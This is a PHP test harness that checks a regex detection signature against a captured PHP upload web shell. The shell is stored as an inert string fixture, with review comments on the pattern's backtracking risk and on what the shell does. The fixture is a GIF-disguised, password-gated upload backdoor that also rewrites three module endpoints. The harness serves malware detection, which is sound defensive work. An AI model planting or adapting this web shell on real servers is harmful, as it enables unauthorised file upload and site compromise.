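// Signature test harness: checks that the detection pattern in $re fires on a
// captured sample of a PHP upload web shell stored in $str.
//
// What the pattern requires, in order:
//   1. ^ with no "m" flag, so the match must begin at the very start of the
//      buffer. A copy of the shell appended further down a file is NOT matched.
//   2. Any run of non-printable, control or whitespace characters, or a
//      "GIF89" header followed by up to 20 arbitrary characters ("s" lets "."
//      cross newlines). This covers shells disguised with an image magic
//      header so that naive upload checks see an image.
//   3. A PHP open tag (short or long form), "echo", a quote, then the banner
//      text "privet bot by bajatax && xsam-xado" with flexible whitespace.
// The "i" flag makes the whole pattern case-insensitive.
//
// NOTE(review): the leading group repeats an alternative that itself contains
// ".{0,20}". Input made of many repeated "GIF89" headers with no PHP tag after
// them can make PCRE backtrack heavily. When a PCRE limit is hit the preg_*
// functions return false, not 0, so the result is checked explicitly below.
$re = '/^(?:[[:^print:][:cntrl:]\s]|GIF89.{0,20})*<\?(?:php)?\s*echo\s*["\']privet\s*bot\s*by\s*bajatax\s*\&\&\s*xsam\-xado/is';

// Test fixture: the captured sample, kept verbatim as inert string data. It is
// never included or evaluated by this script.
//
// Behaviour visible in the sample, useful when hunting for related artefacts:
//   - prints a banner, php_uname() and the working directory;
//   - shows an upload form and accepts the file only when the triple-MD5 of the
//     POST field "baja_xsam" equals a hard-coded digest;
//   - saves the upload next to itself as md5(time()) . ".php", i.e. a file
//     named with 32 hex characters and a .php extension;
//   - rewrites three module endpoints (explorerpro, sampledatainstall,
//     colorpictures) by wrapping their content in a check on the POST field
//     "hash_bajatax", skipping files that already contain that marker.
//     In that wrapper the "==" comparison sits inside the innermost md5()
//     call, so the condition hashes a boolean and is always truthy: a file
//     carrying the marker is evidence of compromise, not a closed endpoint.
//
// NOTE(review): the fixture looks case-normalised ($_files, $_post). PHP
// variable names are case-sensitive, so detection of real samples depends on
// the "i" flag above; confirm against an unmodified sample if one is available.
$str = 'gif89a
<?php echo \'privet bot by bajatax && xsam-xadoo\'.\'<br>\'.\'uname:\'.php_uname().\'<br>\'.$cwd = getcwd(); echo \'<center> <form method="post" target="_self" enctype="multipart/form-data"> <input type="file" size="20" name="uploads" /> <input type="submit" value="upload" /> <input type="password" name="baja_xsam" value="sirt7wa"></form> </center></td></tr> </table><br>\'; if (!empty ($_files[\'uploads\']) and md5(md5(md5($_post["baja_xsam"]))) == "ddb0bfc94159c6ac960367ef994ae246"
) { move_uploaded_file($_files[\'uploads\'][\'tmp_name\'],md5(time()).".php"); echo "<b>uploaded !!!</b><br>name : ".md5(time()).".php"."<br>size : ".$_files[\'uploads\'][\'size\']."<br>type : ".$_files[\'uploads\'][\'type\']; }
$path_exploit_payloads=array("/modules/explorerpro/action.php","/modules/sampledatainstall/sampledatainstall-ajax.php","/modules/colorpictures/ajax/upload.php",);
foreach($path_exploit_payloads as $path_exploit_payload){
if(file_exists($path.$path_exploit_payload)){
$html=" ";
if(function_exists("file_get_contents")){
$html=file_get_contents($path.$path_exploit_payload);
}
if(!preg_match("/hash_bajatax/i",$html)){
$save=fopen($path.$path_exploit_payload,"w");
fwrite($save,\'<?php if(md5(md5(md5($_post["hash_bajatax"]=="7200c4e8bb32ac615efe537aa72d8667")))) { ?> \'.$html." <?php } ?>");
fclose($save);
}
}
}
?>
';

// PREG_SET_ORDER groups results per match: $matches[0] is the first full match.
$matchCount = preg_match_all($re, $str, $matches, PREG_SET_ORDER, 0);

// A PCRE failure (backtrack or JIT stack limit, malformed UTF-8, ...) leaves
// $matches empty, which looks exactly like "no detection". For a scanner that
// is a silent false negative, so fail loudly instead of reporting a clean file.
if ($matchCount === false) {
    throw new RuntimeException('PCRE error code ' . preg_last_error() . ' while applying the signature');
}

// Print the entire match result
var_dump($matches);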